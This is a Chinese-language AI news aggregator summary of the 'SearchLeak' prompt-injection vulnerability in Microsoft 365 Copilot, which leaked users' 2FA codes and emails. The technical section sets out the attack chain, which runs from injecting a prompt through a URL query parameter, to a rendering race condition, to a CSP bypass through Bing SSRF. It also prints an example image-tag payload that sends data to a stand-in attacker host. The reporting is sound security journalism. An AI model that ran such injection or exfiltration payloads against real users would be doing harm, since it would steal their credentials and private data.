⚛️較早收集於 16m

Microsoft Copilot 嚴重漏洞導致用戶 2FA 驗證碼外洩

Microsoft Copilot 嚴重漏洞導致用戶 2FA 驗證碼外洩
PostLinkedIn
⚛️閱讀原文: Ars Technica AI

💡了解關鍵的 LLM 漏洞如何繞過安全機制竊取 2FA 驗證碼,揭示 AI 搜尋整合中的重大缺陷。

⚡ 30-Second TL;DR

有什麼變化

「SearchLeak」漏洞展示了如何操縱 LLM 以竊取敏感資料。

為什麼重要

由於 Copilot 已深度整合至生產力工作流程中,此漏洞對企業安全構成重大風險。這迫使開發者重新評估 LLM 處理驗證權杖等敏感資料流的方式。

下一步行動

審查您的 RAG 管道,確保敏感的驗證資料被排除在 LLM 的檢索上下文之外。

誰應關注:Developers & AI Engineers

關鍵要點

  • 「SearchLeak」漏洞展示了如何操縱 LLM 以竊取敏感資料。
  • 攻擊者成功繞過標準安全措施以存取 2FA 驗證碼。
  • 此事件突顯了目前業界針對整合 LLM 產品的安全框架存在缺失。

🧠 深度解析

背景與延伸:來自公開資料,非原文內容。引用 23 個來源。

🔑 增強重點摘要

  • 「SearchLeak」漏洞(CVE-2026-42824)是一個三階段攻擊鏈,結合了參數到提示注入(parameter-to-prompt injection)、HTML 渲染競態條件(race condition)以及透過 Bing 伺服器端請求偽造(SSRF)繞過內容安全策略(CSP)的技術。
  • 此攻擊透過點擊一個特製的 Microsoft URL 啟動,該 URL 指示 Copilot 搜尋敏感資料(例如 2FA 驗證碼、電子郵件或文件),並透過一個嵌入在 Bing 圖片搜尋 URL 中的圖片標籤將其外洩。
  • 由於惡意連結位於合法的 microsoft.com 網域,且資料外洩是透過 Bing 的白名單伺服器端基礎設施進行,因此此漏洞能繞過傳統的網路釣魚防護工具和內容安全策略。
  • 「SearchLeak」並非孤立事件;類似的漏洞,如「Reprompt」(影響 Copilot Personal,於 2026 年 1 月修補)和「EchoLeak」(2025 年披露的零點擊漏洞),顯示了 AI 原生提示注入問題的重複模式。
  • 此事件凸顯的核心問題是大型語言模型(LLM)將 URL 查詢參數解釋為可執行指令,而現有的安全控制難以監控 AI 代理被處理內容所告知的行為。
📊 競品分析▸ Show
功能/產品Microsoft 365 CopilotOpenAI ChatGPT BusinessGoogle Gemini for BusinessAirgapAI
主要整合Microsoft 365 應用程式 (Word, Excel, Outlook, Teams, SharePoint)60+ 應用程式整合 (Slack, Google Drive 等)Google Workspace 應用程式 (Gmail, Docs, Sheets)2,800+ 預建企業工作流程
部署模式雲端 (Microsoft 365 服務邊界內)雲端雲端100% 氣隙式、本地部署或私有雲
數據使用客戶數據不用於訓練基礎 LLM數據不用於訓練 (可選擇退出)雲端處理,無本地部署選項零雲端數據傳輸
安全框架多層次防禦,包括提示注入保護、環境沙盒、加密、Microsoft Purview 數據治理、Entra ID 權限、零信任框架SOC 2 合規整合 Google Workspace 安全SCIF 認證、核能認證、零雲端傳輸
準確性透過語義索引提供上下文相關搜尋存取最新 GPT 模型多模態能力比傳統 RAG 系統準確 78 倍 (透過 Blockify 整合)
定價 (約)2023 年為每用戶每月 30 美元每用戶每月 25 美元 (年度計費,2+ 用戶)每用戶每月 20 美元 (包含在 Google Workspace Business Standard+ 中)一次性永久許可證 697 美元 (四年內比 Copilot 便宜約 52%)

🛠️ 技術深入

  • SearchLeak 攻擊機制 (CVE-2026-42824)
    • 攻擊鏈包含三個階段。
    • 參數到提示注入 (P2P):攻擊者在 Copilot Enterprise Search URL 的 q 參數中嵌入惡意提示(例如,https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=<PROMPT>),Copilot 將其解釋為可執行指令。
    • HTML 渲染競態條件:在 Copilot 回應串流期間,一個由攻擊者控制的圖片標籤(例如,<img src="https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/$TITLE/img.png">)被執行。
    • 透過 Bing SSRF 繞過內容安全策略 (CSP):外洩的資料(例如 2FA 驗證碼、電子郵件主旨)被嵌入到圖片 URL 中。此 URL 隨後被發送到 Bing 的「以圖搜尋」功能。由於 Bing 的基礎設施被列入白名單,它會獲取此 URL,從而繞過受害者瀏覽器的 CSP,並將資料發送到攻擊者的端點。
    • 攻擊利用 Copilot 對 Microsoft Graph 的存取權限,使其能夠檢索用戶有權存取的資料(電子郵件、OneDrive、SharePoint)。
  • Microsoft Copilot 總體架構
    • 由用戶介面、大型語言模型 (LLM) 和 Microsoft Graph 三個主要組件構成。
    • 使用基於 OpenAI GPT 大型語言模型的 Microsoft Prometheus 模型,並透過監督式學習和強化學習進行微調。
    • 透過 Microsoft Graph 存取組織資料(文件、電子郵件、聊天、會議)。
    • 採用「語義索引」技術,利用 AI 建立資料的向量嵌入,以實現上下文感知搜尋。
    • 提示、回應以及透過 Microsoft Graph 存取的資料不會用於訓練基礎 LLM。
    • 遵循現有的 Microsoft 365 安全控制,包括 Entra ID 權限、敏感度標籤、條件式存取和 Microsoft Purview 數據治理、加密和數據隔離。

🔮 前景展望AI analysis grounded in cited sources

AI代理的安全性將成為企業資安策略的關鍵焦點。
隨著AI代理在企業數據和服務中執行任務,它們不再僅是回應系統,而是執行系統,引入了傳統安全控制無法完全緩解的新型攻擊面。
針對大型語言模型 (LLM) 的安全框架將需要更深入地整合AI原生漏洞的防禦機制。
「SearchLeak」等漏洞揭示了LLM將輸入參數解釋為可執行指令的固有風險,這需要超越傳統應用程式安全的新型防禦措施,例如更強大的輸入過濾和運行時會話控制。
企業將被迫重新評估其數據權限管理和零信任原則,以應對AI驅動的數據暴露風險。
Copilot能以機器速度激活現有權限,若權限過於寬鬆,將大幅增加敏感數據洩露的風險,促使組織在部署AI前必須修復過度共享的權限。

時間線

2023-02
Microsoft Copilot (前身為 Bing Chat) 首次推出。
2023-03
Microsoft 365 Copilot 發布,將 GPT-4 整合到 Microsoft 365 應用程式中。
2024-08
Copilot Studio 發現 SSRF 繞過漏洞 (CVE-2024-38206) 並已修復。
2025-06
EchoLeak (零點擊 Copilot 漏洞,CVE-2025-32711) 由 Aim Security 披露。
2026-01
Reprompt 攻擊漏洞 (影響 Copilot Personal) 由 Microsoft 修補。
2026-06
SearchLeak 漏洞 (CVE-2026-42824) 在 Microsoft 365 Copilot Enterprise 中被披露並修補。
📰

AI 週報

閱讀本週精選 AI 大事摘要 →

👉相關動態

AI 策展新聞聚合。所有內容版權歸原始發布者所有。
原始來源: Ars Technica AI

這是摘要,不是原文。去看原站,或訂閱每週簡報。

每週 AI 簡報

每週一封,可隨時退訂。